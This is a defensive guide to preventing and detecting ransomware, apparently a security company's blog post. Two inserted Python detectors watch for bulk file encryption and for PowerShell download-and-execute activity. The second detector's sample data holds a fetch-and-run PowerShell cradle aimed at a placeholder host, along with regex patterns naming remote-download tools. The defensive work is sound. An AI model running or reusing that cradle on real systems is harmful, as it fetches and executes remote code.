How To Prevent Ransomware Attacks: An Expert Guide

Ransomware attacks grew 350% in 2018, reaching a total of 812 million infected devices, and have become a serious concern for cities, hospitals, schools, and government agencies. As a result, global damage caused by ransomware grew from $11.5 billion in 2019 to $20 billion in 2020.

 

However, you can mitigate or prevent ransomware attacks by implementing user education and training, automating backups, minimizing attack surfaces, having an incident response plan, installing endpoint monitoring and protection across your fleet, and purchasing ransomware insurance. Ransomware can lie dormant and infect your backups before triggering and locking you out of systems. In this case, physical and offsite backups can be implemented as an additional layer of security.

 


What Is Ransomware?

 

Ransomware is a type of malicious software designed to deny users access to the files on their computer. It accomplishes this by encrypting those files so that only the malware operator can decrypt them.

 

A wide range of ransomware variants exists, including Ryuk, LockerGoga, and thousands of others. New variants are developed on a daily basis and used by threat actors against specific targets and for different purposes.

 

Ransomware attacks are so successful because they are so simple and have a clear psychological impact upon their target. They can infect any type of computer (laptops/desktops, mobile devices, IoT, routers, cloud storage, etc.) and deny the owner access to the data stored on these systems.


 

How Do You Prevent Ransomware Attacks?

 

By the time the ransom message pops up on a machine, it is too late to save the system. Taking steps in advance can help to protect against and prevent a cyber attack from occurring in the first place.

 

In 2017 and 2018, the majority of ransomware attacks were untargeted. Going into 2019, ransomware tactics shifted to target larger organizations with the capability to pay more substantial ransoms.

 

These attacks use tailored pretexts to trick targets, enabling the attackers to infect and encrypt endpoints and spread across the network, often costing organizations hundreds of thousands, if not millions, of dollars in damages.

 

 

User Education and Training

 

Many malware types, including ransomware, are spread via phishing and other social engineering attacks. Training users to recognize these threats decreases the risk of infection.

 

Automated Backups

 

Ransomware attacks force targets to pay for access to encrypted files. If recent backups exist, there is no reason to pay the ransom. It’s important to keep in mind that offline and offsite backups may also be used as an additional layer of security should backups become infected.

 

Cloud drives like OneDrive or Google Drive are not an acceptable way to handle your backups. If your computer can be connected and is mapped to the cloud drive then you’re still susceptible to a ransomware attack.

 

Minimize Attack Surface

 

Malware commonly takes advantage of existing vulnerabilities, insecure services (like RDP), and built-in tools like PowerShell. Keeping vulnerabilities patched, antivirus updated, and unnecessary services disabled reduces the attack surface.

 

Incident Response Plan

 

In the wake of a ransomware attack, responding rapidly and correctly is essential. Having a plan in place ensures that the IT/security team properly handles a potential incident.

 

Endpoint Monitoring and Protection

 

Identifying ransomware infections early can make it possible to terminate the attack before too much damage is done. Endpoints should have monitoring solutions in place and the ability to automatically terminate potential infections.

 

Ransomware Insurance

 

Recovering from a ransomware attack can be expensive. Having ransomware insurance in place can minimize the cost to the organization.


 

What Do You Do If You Fall Victim To A Ransomware Attack?

 

If a system has been infected by ransomware, a quick response is essential. Ransomware rapidly encrypts files and attempts to spread itself to other systems, meaning that the impact of an attack grows rapidly if a response is delayed.

 

If a ransomware attack is detected, take the following actions:

 

  • Quarantine the affected system: Ransomware variants will often try to spread themselves through the network. This can be done simply by unplugging the network cable.
  • Notify the IT/security team: The team should have recovery procedures in place.
  • Do not restart the computer: Some ransomware variants accidentally encrypt critical system files. A computer may not power back on after infection.
  • Make a copy of the infected drive: Some ransomware decryptors, like Ryuk's, will accidentally destroy files, even with the correct key.
  • Attempt disk decryption with ransomware decryption tools: Decryptors have been released for flawed ransomware variants and may be able to perform decryption.
  • Restore infected systems from clean versions: Ransomware may have persistence mechanisms that make it difficult to remove without a full wipe.
  • Restore systems from clean backups: If possible, restore systems from backups that predate the ransomware infection. Always restore from a copy to protect the original.
  • Sanitize removable media, connected drives, etc.: Ransomware commonly tries to spread by infecting other connected drives. These should be quarantined and sanitized to remove the infection.

 

How Does A Ransomware Attack Work?

 

Ransomware is a type of malware that uses modern encryption algorithms to make money for cybercriminals. Encryption algorithms in common use today, like the Advanced Encryption Standard (AES), are impossible to crack with current technology.

 

Most ransomware is automated and commonly spread through social engineering techniques, such as phishing, with the purpose of denying businesses access to mission-critical files and data.

 

Post-infection, the risk of losing this data forever drives individuals and organizations to pay the ransom.

 

8 steps to how a ransomware attack works

 

The steps below are a simplified view of how a ransomware attack infects a network within an organization:

 

  • Step 1: A threat actor sends an email containing a malicious attachment or link.
  • Step 2: The email bypasses the spam filter and reaches the user's inbox.
  • Step 3: The user opens the malicious email and clicks the link or downloads the attachment.
  • Step 4: The antivirus fails to block the threat.
  • Step 5: Malware XYZ.exe is delivered and the payload is executed on the user's machine.
  • Step 6: The victim’s files are encrypted by the malware.
  • Step 7: A ransom note is sent typically asking for payment in untraceable bitcoin.
  • Step 8: Attackers move laterally across an organization to spread the virus and maximize the effectiveness of the attack.

 

Once data has been encrypted by one of these algorithms, the only way to access it is with the corresponding encryption key.

 

Cybercriminals take advantage of this fact by infecting target machines with malware. One of the most common ways of doing so is through spear-phishing emails. For example, an email with an attached Microsoft Word document will use Word macros (or other means) to download and execute ransomware malware.

 

Or, they may target executive assistants pretending to be a C-level executive requesting a transfer of funds or the purchase of gift cards:

[Image: example of a spear phishing email impersonating a C-level executive]

Once on the machine, the malware starts encrypting the user's files. The ransomware variant determines how files are encrypted. Some perform wholesale encryption of files, leaving only those essential to the operation of the computer.

 

Others perform more targeted attacks, selecting files that are more likely to be of value to the target.

 

Many ransomware variants will also attempt to spread themselves to other systems after the initial infection. WannaCry is famous for using the EternalBlue exploit as its primary infection mechanism, but many modern variants will look for connected removable media (e.g. USB drives), attached drives, or file servers.

 

If any of these are detected, the ransomware will copy itself over and infect those as well.

 

[Image: example of a ransom message displayed after encryption]

 

After encryption is completed, the ransomware will display a ransom message to the user. The image above is an example of this, but the details vary from variant to variant. These messages typically demand a ransom in Bitcoin in exchange for the user’s decryption key and software.

 

The growth of ransomware has also been facilitated by the creation of Ransomware-as-a-Service (RaaS). With RaaS, ransomware authors sell their services or kits to less sophisticated users that use them to perform ransomware attacks against targets of their choice.

 

This enables less skilled cybercriminals to carry out attacks while making a profit for ransomware authors.

 

Who Are Most At Risk Of A Ransomware Attack?

 

In the past, ransomware attackers preferred a “quantity over quality” approach. Ransomware outbreaks like WannaCry tried to infect as many computers as possible and requested a small ransom from each.

 

However, this approach proved not to be cost-effective for attackers. For the average user, the process of purchasing and sending Bitcoin to pay a ransom is over their head.

 

As a result, cybercriminals either did not receive ransoms or had to waste time on customer support, which cut into their profits.

 

The modern ransomware threat targets larger organizations and demands more substantial ransom payments from each target. Common targets include:

 


 

The impact of a ransomware attack can vary greatly. Some targets got off relatively lightly, either paying a small ransom, restoring from backups, or writing off the lost data. Other organizations paid a much higher price.

 

In May 2019, the city of Baltimore, Maryland was targeted by ransomware.

 

The cybercriminals demanded approximately $80,000 in ransom to enable the city to regain access to the city’s computer systems. However, on the advice of the Secret Service and the FBI, the city elected not to pay.

 

In the end, the price tag of the Baltimore ransomware attack was approximately $18 million. The city accepted this price tag as the cost of sticking to its principles.

 

Paying the ransom would have enabled the cybercriminals to fund additional attacks against other targets. Additionally, being willing to pay the ransom can make an organization a greater target in the future since it is seen as an “easy mark”.

 

While Baltimore chose not to pay the ransom, not every organization or city makes this choice. Numerous cities, including West Haven, Connecticut and Valdez, Alaska, chose to pay a “one-time fee” rather than accept the additional costs of recovering on their own.

 

The Ransom Payment Dilemma – Should You Pay?

 

Best practice says that organizations should never pay a ransom after an attack. However, in some cases, business drivers force organizations to pay in order to regain access to critical data, for example when the data, such as proprietary intellectual property, is valuable enough to leave the company little choice.

 

The FBI recently released documentation outlining what to consider before paying a ransom:

 

[Image: FBI guidance on what to consider before paying a ransom]

 

In practice, no real consensus exists on the topic of whether or not to pay a ransom. Additional factors mean that the choice is not always as simple as whether or not to pay.

 

On the one hand, paying a ransom theoretically gives an organization access to its encrypted data. However, this is not always the case. In fact, the decryptor for the Ryuk variant of ransomware has a programming bug that accidentally drops the last byte of a decrypted file.

 

In many files, this byte is unneeded padding, but, in others, it is essential to opening and parsing the file.

 

On the other hand, failing to pay a ransom means that the attacker gets nothing for their attack. Since the goal of a ransomware attack is to make a profit, some cybercriminals are taking action to prevent this. Some ransomware variants now steal sensitive data before encrypting it.

 

If the victim refuses to pay the ransom, the attacker threatens to sell this data to a competitor or publicly release it. If this data contains sensitive customer data, it would be considered a data breach under the General Data Protection Regulation (GDPR) and similar data privacy laws.

 

How Do You Identify Ransomware On Your Network?

 

Like any type of malware, some ransomware variants can be detected using traditional signature-based antivirus and antimalware solutions.

 

However, malware authors are increasingly using zero-day attacks and polymorphic malware to evade these detection systems. As a result, signature-based antivirus only detects about half of malware.

 

The nature of ransomware also means that it can be detected by other means. In order to perform bulk encryption of a user’s files, the malware must open a large number of files, encrypt them, and destroy the original versions.

 

Since these are not actions typically taken by a legitimate user, they can be used to help detect and prevent a ransomware attack.

 

An organization’s security information and event management (SIEM) solution and intrusion prevention systems (IPS) can be configured to include rules to detect these activities and take action.

 

If a program on a computer is exhibiting this behavior, it should be immediately killed to minimize the impact of an attack.
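As an added example (not code from the original article), here is the behavioral rule described above scored over file-activity events in Python: a process that writes many replacement files and destroys the originals across several directories within a short window is flagged, and an entropy check on written content supplies a second signal, since ciphertext sits near 8 bits per byte. The event format, the process names, the thresholds, the `.locked` extension and the sample events are all assumptions constructed for this example; in practice the same scoring would run on EDR, Sysmon or auditd file events feeding a SIEM or IPS.

```python
"""Score file activity for the bulk open-encrypt-destroy pattern of ransomware.

Added example, not code from the original article. Event tuples are
(seconds, pid, image, op, path) with op in read/write/delete, as an EDR,
Sysmon or auditd feed would provide; the samples below are constructed.
"""
import math
from collections import defaultdict

WINDOW_SECONDS = 60.0     # sliding window over one process's file events (assumed threshold)
MIN_FILES = 20            # originals destroyed in the window before we call it bulk
MIN_DIRECTORIES = 3       # spread beyond one application's own folder
MIN_DESTROY_RATIO = 0.8   # share of written files whose original was deleted
HIGH_ENTROPY = 7.5        # bits per byte; ciphertext sits close to 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: ~8.0 for encrypted or compressed data, ~4.5 for English text."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_encrypted(data: bytes) -> bool:
    """Second signal: content written by the process is high-entropy (encrypted output)."""
    return shannon_entropy(data) >= HIGH_ENTROPY


def _score_window(evs):
    """Return finding details if this window shows bulk destroy-and-replace, else None."""
    written, deleted = set(), set()
    for _ts, _pid, _image, op, path in evs:
        if op == "write":
            written.add(path)
        elif op == "delete":
            deleted.add(path)
    if not written:
        return None
    # An original counts as destroyed when a deleted path is the stem of a written one
    # (report.docx deleted, report.docx.locked written). In-place overwrites are not
    # caught by this rule; the entropy check covers that case.
    destroyed = {w for w in written if any(w.startswith(d + ".") for d in deleted)}
    dirs = {w.rpartition("\\")[0] for w in destroyed}
    ratio = len(destroyed) / len(written)
    if len(destroyed) >= MIN_FILES and len(dirs) >= MIN_DIRECTORIES and ratio >= MIN_DESTROY_RATIO:
        return {"destroyed": len(destroyed), "writes": len(written),
                "directories": len(dirs), "destroy_ratio": round(ratio, 2)}
    return None


def detect_bulk_encryption(events, window=WINDOW_SECONDS):
    """Map pid -> finding for every process whose activity matched in some window."""
    by_pid = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[0]):
        by_pid[ev[1]].append(ev)
    findings = {}
    for pid, evs in by_pid.items():
        best, start = None, 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # age out old events
                start += 1
            score = _score_window(evs[start:end + 1])
            if score and (best is None or score["destroyed"] > best["destroyed"]):
                best = score
        if best:
            findings[pid] = dict(image=evs[-1][2], **best)
    return findings


def constructed_sample_events():
    """Constructed telemetry: two benign processes and one replacing 30 files with '.locked' copies."""
    docs = "C:\\Users\\alice\\Documents"
    events = [(0.0, 1234, "WINWORD.EXE", "write", docs + "\\report.docx"),
              (0.2, 1234, "WINWORD.EXE", "delete", docs + "\\~WRL0001.tmp")]
    events += [(i * 0.05, 555, "backup-agent.exe", "read", f"{docs}\\{i}.pdf") for i in range(100)]
    folders = ["Documents", "Pictures", "Desktop", "Music", "Videos"]
    malware = "C:\\Users\\alice\\AppData\\Local\\Temp\\XYZ.exe"   # name taken from the article's walkthrough
    for i in range(30):
        original = f"C:\\Users\\alice\\{folders[i % 5]}\\file{i}.docx"
        events.append((10 + i * 0.1, 4242, malware, "write", original + ".locked"))
        events.append((10 + i * 0.1 + 0.01, 4242, malware, "delete", original))
    return events


if __name__ == "__main__":
    for pid, finding in detect_bulk_encryption(constructed_sample_events()).items():
        print(f"pid {pid} {finding['image']}: {finding}")
    print("ciphertext-like:", looks_encrypted(bytes(range(256)) * 4))
```

The benign word processor (one write, one temp-file delete) and the backup agent (many reads, no deletes) never reach the threshold, while the process replacing originals in five folders does; the thresholds are the knobs a SIEM or IPS rule would tune per environment, and the action on a hit is the one the article names: kill the process.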

 

Ransomware can also be detected based upon its use of built-in functionality on a target computer. Many malware variants are now designed to “live off the land” by using Microsoft PowerShell to download and run malware.

 

Similarly, ransomware commonly accesses the operating system’s embedded cryptographic libraries for encryption. Monitoring for use of these functions can also help to detect and block ransomware on a system.
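A companion added example, again not code from the original article, for the "living off the land" pattern above: a Python check over PowerShell command lines that decodes `-EncodedCommand` arguments (base64 over UTF-16LE) and flags the download-and-execute combination the article describes. The indicator tokens, the sample command lines and the `example.invalid` host are constructed for illustration; real input would come from process-creation or script block logging telemetry.

```python
"""Flag PowerShell command lines that fetch remote content and execute it.

Added example, not code from the original article. Command lines would come
from process-creation telemetry (Windows event 4688 or Sysmon event 1) or
script block logging (event 4104); the samples below are constructed.
"""
import base64
import binascii
import re

# -e / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts the abbreviations).
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
# Well-known defender indicators of remote fetch and in-memory execution (illustrative, not exhaustive).
DOWNLOAD = re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                      r"|invoke-restmethod|start-bitstransfer", re.IGNORECASE)
EXECUTE = re.compile(r"invoke-expression|\biex\b", re.IGNORECASE)


def decode_encoded_command(blob: str):
    """PowerShell -EncodedCommand is base64 over UTF-16LE; return the text or None if it is not."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if len(raw) % 2:
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze_powershell(command_line: str) -> dict:
    """Return the decoded script (if any) and which indicators the command line triggers."""
    m = ENCODED_ARG.search(command_line)
    decoded = decode_encoded_command(m.group(1)) if m else None
    haystack = command_line + "\n" + (decoded or "")
    download = bool(DOWNLOAD.search(haystack))
    execute = bool(EXECUTE.search(haystack))
    hidden = bool(HIDDEN_WINDOW.search(command_line))
    # Encoding and hidden windows are weak signals on their own (administrators use them);
    # a remote fetch combined with in-memory execution, or with an encoded command, is strong.
    suspicious = download and (execute or decoded is not None)
    return {"encoded": decoded is not None, "decoded": decoded, "download": download,
            "execute": execute, "hidden_window": hidden, "suspicious": suspicious}


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (used here to construct samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: two benign administrative invocations and one download cradle
# pointing at a placeholder host.
SAMPLE_COMMAND_LINES = [
    r'powershell.exe -NoProfile -Command "Get-ChildItem C:\Logs | Where-Object Length -gt 1MB"',
    "powershell.exe -enc " + encode_command("Get-Date"),
    "powershell.exe -w hidden -enc " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/update.ps1')"),
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        r = analyze_powershell(line)
        print("SUSPICIOUS" if r["suspicious"] else "ok        ", r["decoded"] or line)
```

Decoding before matching matters: the indicator strings never appear in the raw command line of the third sample, only in its decoded script, so a rule that inspects command lines without decoding misses exactly the case the article warns about.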

 

Conclusion

 

Ransomware is a significant security threat to any organization, but it’s entirely preventable. Taking action to minimize the probability of infection and ensuring that clean backups are available for system restoration can dramatically decrease the cost associated with a ransomware attack.

 


Jason Firch, MBA

Jason is a veteran IT operations manager, digital marketer, as well as the co-founder and CEO of PurpleSec, with nearly a decade of experience in business management and operations. When he's not studying for his CISSP or contributing to the PurpleSec blog you'll find Jason helping nonprofits with their online marketing.
